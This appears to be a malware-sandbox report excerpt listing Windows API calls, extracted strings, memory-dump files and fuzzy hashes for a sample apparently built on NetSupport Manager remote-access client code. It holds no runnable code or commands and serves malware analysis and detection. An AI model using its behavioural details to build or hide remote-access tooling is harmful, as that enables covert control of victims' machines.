                                                                                                        • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                      • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                                      • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                                      • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                                      • GetDC.USER32(00000000), ref: 11133F03
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                                      • CreateWindowExA.USER32(00000001,NSMWClass,026AD358,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                      • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                      • API String ID: 1594747848-1114959992
                                                                                                      • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                      • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                                      • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                      • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                                      APIs
                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,4764EAAA,?,00000000,00000000), ref: 1102CE44
                                                                                                      • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                                      • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                                      • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                      • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                      • API String ID: 83693535-2077998243
                                                                                                      • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                                      • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                                      • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                                      • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                                      APIs
                                                                                                      • wsprintfA.USER32 ref: 11132C60
                                                                                                      • GetTickCount.KERNEL32 ref: 11132C91
                                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                      • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$FolderPathwsprintf
                                                                                                      • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                      • API String ID: 1170620360-4157686185
                                                                                                      • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                                      • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                                      • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                                      • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                      • _memset.LIBCMT ref: 1114512D
                                                                                                        • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                      • _strncpy.LIBCMT ref: 111451FA
                                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                      • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                      • API String ID: 3299820421-2117887902
                                                                                                      • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                      • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                                      • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                      • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                                      APIs
                                                                                                      • _strtok.LIBCMT ref: 11026C26
                                                                                                      • _strtok.LIBCMT ref: 11026C60
                                                                                                      • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strtok$Sleep
                                                                                                      • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                      • API String ID: 2009458258-3774545468
                                                                                                      • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                                      • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                                      • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                                      • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C7667B5), ref: 6C758D6B
                                                                                                        • Part of subcall function 6C754F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C758DC8), ref: 6C754F78
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 6C758DCB
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C758DD8
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C758EBF
                                                                                                        • Part of subcall function 6C754FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C754FC4
                                                                                                        • Part of subcall function 6C754FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C758E0D,00000000,?,6C758E0D,00000000,?,00000FA0,?), ref: 6C754FE4
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C758EAE
                                                                                                        • Part of subcall function 6C755000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C755014
                                                                                                        • Part of subcall function 6C755000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C758E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C755034
                                                                                                        • Part of subcall function 6C752420: _strrchr.LIBCMT ref: 6C75242E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                      • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                      • API String ID: 2714439535-3484705551
                                                                                                      • Opcode ID: 0b260629cdf4308d7ac9e960bd57c35411686c9e72164ff30b244c98af7b1893
                                                                                                      • Instruction ID: f6549eea7a9793bb9ca77f8f1fa4f4e12b3e093de468007381bebe4522f23b49
                                                                                                      • Opcode Fuzzy Hash: 0b260629cdf4308d7ac9e960bd57c35411686c9e72164ff30b244c98af7b1893
                                                                                                      • Instruction Fuzzy Hash: 74411771B502189BDF10DF51DE49FEA737CEB45708F8004B9EA19AAA40EF309A58CF61
                                                                                                      APIs
                                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                                      • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                                      • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                                      • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                                      • GetLastError.KERNEL32 ref: 11102CB1
                                                                                                      • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                                      • GetLastError.KERNEL32 ref: 11102CCF
                                                                                                      Strings
                                                                                                      • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                                      • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                                      • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                      • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                      • API String ID: 2036220054-60805735
                                                                                                      • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                                      • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                                      • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                                      • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                                      APIs
                                                                                                      • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                                      • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                                      • wsprintfA.USER32 ref: 1115E3C8
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                      • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                                      • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                      • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                      • API String ID: 1734919802-1728070458
                                                                                                      • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                                      • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                                      • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                                      • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • std::exception::exception.LIBCMT ref: 1111013A
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                      • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                      • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                      • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                      • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                      • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                      • API String ID: 1976012330-1024648535
                                                                                                      • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                                      • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                                      • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                                      • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                                      APIs
                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,4764EAAA,00000000,?,00000000), ref: 11060874
